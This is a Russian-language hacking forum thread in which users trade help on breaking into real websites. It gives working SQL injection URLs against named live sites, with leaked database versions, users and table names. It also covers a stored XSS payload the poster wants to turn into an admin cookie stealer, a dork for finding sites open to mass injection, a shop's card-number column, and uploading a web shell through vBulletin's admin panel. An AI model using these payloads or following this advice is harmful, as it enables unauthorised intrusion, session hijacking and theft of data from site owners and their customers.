Ваши вопросы по уязвимостям.

Смотря, какой сервер стоит

 

Здравствуйте.
Есть доступ к бд сайта на wordpress, но проблема в том что я не знаю адрес самого сайта 0_о
Внимание вопрос:
Можно ли узнать адрес ресурса на wordpress имея доступ к его БД? И если можно то подскажите в какой таблице искать плиз.

 

http://forum.antichat.ru/thread229555.html

 

Таблица:
wp_options
в ней данные о урл блога

 

Code:

http://www.euromet.ru/search/?search=ololo' and updatexml(0x03b,concat(0x3b,(select version())),0x03b)-- x

не пойму как дальше таблицы и колонки вывести

 

Code:

http://www.linleygroup.com/events/event.php?num=-500000+/*!UnION*/+/*!SElECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+

Прошу помощи в раскрутке.

 

MySQL Error: Duplicate entry '5.0.92-community:linley5_tlgcms:linley5_linley5@localhost:unknow' for key 1

MySQL Error: Duplicate entry 'linley5_tlgcms:cms_accounts: password1' for key 1

 

http://www.euromet.ru/search/?search=ololo'%20and%20updatexml(0x03b,concat(0x3b,(select%20table_name%20FROM%20information_schema.tables%20limit%200,1)),0x03b)--%20x

Error Number: 1105 XPATH syntax error: ';CHARACTER_SETS'

=\\

 

Что можно с этим сделать?

Полный размер
И что это за хеши внизу, точнее от чего они?

 

Похекать шоп не получится, так как стоит 4 ветка MySQL.

4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu

 

При регистрации в поле вопрос я ввел "><script>alert(/XSS/)</script> потом взял поле востановить пароль ввел свой логин и код с картинки, потом меня переадресовует на страницу с вопросом и тогда высвечиваеться /XSS/
Вопрос: как сделать из этого снифер? И пожалуйста скажите когда я кину ссылку админу и он не будет авторизован на сайте то его куки не крадуться?(То есть нужно чтобы он был авторизован на сайте?)

 

проблемка есть....соснифал куки админа, меняю куки на его... рефрешу линку на админку... ноль эмоций. недоступен урл.

может быть привязка к ip? есть еще варианты?

 

нет доступа к inf. schema - не значит, что похекать не получится.

 

Всё получиться
То что стоит что четвёртая версия, это значит что только невозможно узнать названия таблиц.


Префикс таблиц: 'theqice_'

Дорк:

Code:

inurl:"prodisp.php?prodcatind"

Почти везде есть SQL-inj. Получаем доступ к одному из сайтов. Узнаём CMS/Названия таблиц. Ну а потом(Чисто теоретически) почти всех в этом списке, в том числе и ваш сайт можно похекать.

 

а не проще поставить такой двиг себе на машину?)

 

вынужден вас огорчить - колонка с номер карты зашифрована, и судя по длине, обратно расшифровать не получится

 

скинул названия таблиц + колонок в ПМ

 

Как залить шел в vBulletin 4.0.3 если есть доступ к админке?
Вот таблицы в admincp



Что нажимать? просто я нап первый раз заливаю шел

 

http://forum.antichat.ru/thread22852.html

 

Те что пишут:
Способ заливки шелла в vBulletin 3.5.*.
Способ заливки шелла в vBulletin 2.*.* и 3.0.*
Я пробивал и нечего не получилось... Писало Error на линии 1010